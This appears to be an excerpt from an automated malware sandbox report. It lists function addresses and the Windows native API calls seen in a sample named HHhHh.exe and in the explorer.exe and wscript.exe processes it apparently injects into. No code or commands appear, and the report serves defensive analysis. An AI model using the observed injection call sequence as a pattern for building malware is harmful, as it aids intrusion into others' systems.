          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A490 NtClose,4_2_0041A490
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,4_2_0041A540
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A35A NtCreateFile,4_2_0041A35A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A53A NtAllocateVirtualMemory,4_2_0041A53A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2B60 NtClose,LdrInitializeThunk,4_2_012D2B60
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_012D2BF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2AD0 NtReadFile,LdrInitializeThunk,4_2_012D2AD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_012D2D30
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_012D2D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_012D2DF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_012D2DD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_012D2C70
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_012D2CA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2F30 NtCreateSection,LdrInitializeThunk,4_2_012D2F30
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2FB0 NtResumeThread,LdrInitializeThunk,4_2_012D2FB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_012D2F90
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2FE0 NtCreateFile,LdrInitializeThunk,4_2_012D2FE0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_012D2EA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_012D2E80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D4340 NtSetContextThread,4_2_012D4340
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D4650 NtSuspendThread,4_2_012D4650
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2BA0 NtEnumerateValueKey,4_2_012D2BA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2B80 NtQueryInformationFile,4_2_012D2B80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2BE0 NtQueryValueKey,4_2_012D2BE0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2AB0 NtWaitForSingleObject,4_2_012D2AB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2AF0 NtWriteFile,4_2_012D2AF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2D00 NtSetInformationFile,4_2_012D2D00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2DB0 NtEnumerateKey,4_2_012D2DB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2C00 NtQueryInformationProcess,4_2_012D2C00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2C60 NtCreateKey,4_2_012D2C60
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2CF0 NtOpenProcess,4_2_012D2CF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2CC0 NtQueryVirtualMemory,4_2_012D2CC0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2F60 NtCreateProcessEx,4_2_012D2F60
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2FA0 NtQuerySection,4_2_012D2FA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2E30 NtWriteVirtualMemory,4_2_012D2E30
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D2EE0 NtQueueApcThread,4_2_012D2EE0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D3010 NtOpenDirectoryObject,4_2_012D3010
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D3090 NtSetValueKey,4_2_012D3090
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D35C0 NtCreateMutant,4_2_012D35C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D39B0 NtGetContextThread,4_2_012D39B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D3D10 NtOpenProcessToken,4_2_012D3D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D3D70 NtOpenThread,4_2_012D3D70
          Source: C:\Windows\explorer.exeCode function: 5_2_11269232 NtCreateFile,5_2_11269232
          Source: C:\Windows\explorer.exeCode function: 5_2_1126AE12 NtProtectVirtualMemory,5_2_1126AE12
          Source: C:\Windows\explorer.exeCode function: 5_2_1126AE0A NtProtectVirtualMemory,5_2_1126AE0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04DA2CA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04DA2C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C60 NtCreateKey,LdrInitializeThunk,6_2_04DA2C60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04DA2DD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04DA2DF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04DA2D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04DA2EA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FE0 NtCreateFile,LdrInitializeThunk,6_2_04DA2FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F30 NtCreateSection,LdrInitializeThunk,6_2_04DA2F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AD0 NtReadFile,LdrInitializeThunk,6_2_04DA2AD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04DA2BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04DA2BE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2B60 NtClose,LdrInitializeThunk,6_2_04DA2B60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA35C0 NtCreateMutant,LdrInitializeThunk,6_2_04DA35C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA4650 NtSuspendThread,6_2_04DA4650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA4340 NtSetContextThread,6_2_04DA4340
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CC0 NtQueryVirtualMemory,6_2_04DA2CC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CF0 NtOpenProcess,6_2_04DA2CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C00 NtQueryInformationProcess,6_2_04DA2C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DB0 NtEnumerateKey,6_2_04DA2DB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D00 NtSetInformationFile,6_2_04DA2D00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D30 NtUnmapViewOfSection,6_2_04DA2D30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2EE0 NtQueueApcThread,6_2_04DA2EE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2E80 NtReadVirtualMemory,6_2_04DA2E80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2E30 NtWriteVirtualMemory,6_2_04DA2E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F90 NtProtectVirtualMemory,6_2_04DA2F90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FB0 NtResumeThread,6_2_04DA2FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FA0 NtQuerySection,6_2_04DA2FA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F60 NtCreateProcessEx,6_2_04DA2F60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AF0 NtWriteFile,6_2_04DA2AF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AB0 NtWaitForSingleObject,6_2_04DA2AB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2B80 NtQueryInformationFile,6_2_04DA2B80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BA0 NtEnumerateValueKey,6_2_04DA2BA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3090 NtSetValueKey,6_2_04DA3090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3010 NtOpenDirectoryObject,6_2_04DA3010
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3D70 NtOpenThread,6_2_04DA3D70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3D10 NtOpenProcessToken,6_2_04DA3D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA39B0 NtGetContextThread,6_2_04DA39B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A360 NtCreateFile,6_2_0091A360
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A490 NtClose,6_2_0091A490
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A410 NtReadFile,6_2_0091A410
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A540 NtAllocateVirtualMemory,6_2_0091A540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A35A NtCreateFile,6_2_0091A35A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A53A NtAllocateVirtualMemory,6_2_0091A53A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,6_2_04ADA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,6_2_04AD9BAF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADA042 NtQueryInformationProcess,6_2_04ADA042
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_04AD9BB2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_04B3D5DC2_2_04B3D5DC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051CECD82_2_051CECD8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C85D82_2_051C85D8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C85C82_2_051C85C8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C04002_2_051C0400
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C81932_2_051C8193
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C81A02_2_051C81A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051CA0B82_2_051CA0B8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051CA0A82_2_051CA0A8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C03F02_2_051C03F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C7D5B2_2_051C7D5B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C7D682_2_051C7D68
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C9C702_2_051C9C70
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051C9C802_2_051C9C80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_004011744_2_00401174
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D90C4_2_0041D90C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041E23C4_2_0041E23C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041EB3A4_2_0041EB3A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041C3E64_2_0041C3E6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00402D884_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D5A64_2_0041D5A6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00409E5B4_2_00409E5B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00409E604_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041E7AF4_2_0041E7AF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012901004_2_01290100
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133A1184_2_0133A118
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013281584_2_01328158
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013601AA4_2_013601AA
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013581CC4_2_013581CC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013320004_2_01332000
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135A3524_2_0135A352
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013603E64_2_013603E6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AE3F04_2_012AE3F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013402744_2_01340274
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013202C04_2_013202C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A05354_2_012A0535
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013605914_2_01360591
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013524464_2_01352446
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134E4F64_2_0134E4F6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A07704_2_012A0770
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C47504_2_012C4750
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129C7C04_2_0129C7C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BC6E04_2_012BC6E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B69624_2_012B6962
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A29A04_2_012A29A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0136A9A64_2_0136A9A6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A28404_2_012A2840
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AA8404_2_012AA840
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012868B84_2_012868B8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CE8F04_2_012CE8F0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135AB404_2_0135AB40
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01356BD74_2_01356BD7
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA804_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AAD004_2_012AAD00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B8DBF4_2_012B8DBF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129ADE04_2_0129ADE0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0C004_2_012A0C00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01340CB54_2_01340CB5
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290CF24_2_01290CF2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E2F284_2_012E2F28
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C0F304_2_012C0F30
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01314F404_2_01314F40
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131EFA04_2_0131EFA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012ACFE04_2_012ACFE0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01292FC84_2_01292FC8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135EE264_2_0135EE26
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0E594_2_012A0E59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135CE934_2_0135CE93
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B2E904_2_012B2E90
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135EEDB4_2_0135EEDB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012D516C4_2_012D516C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128F1724_2_0128F172
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0136B16B4_2_0136B16B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AB1B04_2_012AB1B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135F0E04_2_0135F0E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013570E94_2_013570E9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A70C04_2_012A70C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134F0CC4_2_0134F0CC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135132D4_2_0135132D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128D34C4_2_0128D34C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E739A4_2_012E739A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A52A04_2_012A52A0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013412ED4_2_013412ED
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BB2C04_2_012BB2C0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013575714_2_01357571
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133D5B04_2_0133D5B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135F43F4_2_0135F43F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012914604_2_01291460
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135F7B04_2_0135F7B0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013516CC4_2_013516CC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_013359104_2_01335910
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A99504_2_012A9950
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BB9504_2_012BB950
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130D8004_2_0130D800
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A38E04_2_012A38E0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135FB764_2_0135FB76
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BFB804_2_012BFB80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01315BF04_2_01315BF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012DDBF94_2_012DDBF9
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01313A6C4_2_01313A6C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01357A464_2_01357A46
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135FA494_2_0135FA49
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E5AA04_2_012E5AA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133DAAC4_2_0133DAAC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0134DAC64_2_0134DAC6
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01357D734_2_01357D73
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A3D404_2_012A3D40
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01351D5A4_2_01351D5A
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BFDC04_2_012BFDC0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01319C324_2_01319C32
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135FCF24_2_0135FCF2
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135FF094_2_0135FF09
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0135FFB14_2_0135FFB1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A1F924_2_012A1F92
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A9EB04_2_012A9EB0
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EC2325_2_0E6EC232
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6E6B325_2_0E6E6B32
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6E6B305_2_0E6E6B30
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EB0365_2_0E6EB036
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6E20825_2_0E6E2082
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6E3D025_2_0E6E3D02
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6E99125_2_0E6E9912
          Source: C:\Windows\explorer.exeCode function: 5_2_0E6EF5CD5_2_0E6EF5CD
          Source: C:\Windows\explorer.exeCode function: 5_2_112692325_2_11269232
          Source: C:\Windows\explorer.exeCode function: 5_2_11263B325_2_11263B32
          Source: C:\Windows\explorer.exeCode function: 5_2_11263B305_2_11263B30
          Source: C:\Windows\explorer.exeCode function: 5_2_11260D025_2_11260D02
          Source: C:\Windows\explorer.exeCode function: 5_2_112669125_2_11266912
          Source: C:\Windows\explorer.exeCode function: 5_2_1126C5CD5_2_1126C5CD
          Source: C:\Windows\explorer.exeCode function: 5_2_112680365_2_11268036
          Source: C:\Windows\explorer.exeCode function: 5_2_1125F0825_2_1125F082
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E1E4F66_2_04E1E4F6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E224466_2_04E22446
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E305916_2_04E30591
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D705356_2_04D70535
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D8C6E06_2_04D8C6E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D6C7C06_2_04D6C7C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D947506_2_04D94750
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D707706_2_04D70770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E020006_2_04E02000
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E281CC6_2_04E281CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E301AA6_2_04E301AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DF81586_2_04DF8158
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D601006_2_04D60100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E0A1186_2_04E0A118
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DF02C06_2_04DF02C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E102746_2_04E10274
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E303E66_2_04E303E6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D7E3F06_2_04D7E3F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2A3526_2_04E2A352
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D60CF26_2_04D60CF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E10CB56_2_04E10CB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D70C006_2_04D70C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D6ADE06_2_04D6ADE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D88DBF6_2_04D88DBF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D7AD006_2_04D7AD00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2EEDB6_2_04E2EEDB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D82E906_2_04D82E90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2CE936_2_04E2CE93
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D70E596_2_04D70E59
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2EE266_2_04E2EE26
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D62FC86_2_04D62FC8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D7CFE06_2_04D7CFE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DEEFA06_2_04DEEFA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DE4F406_2_04DE4F40
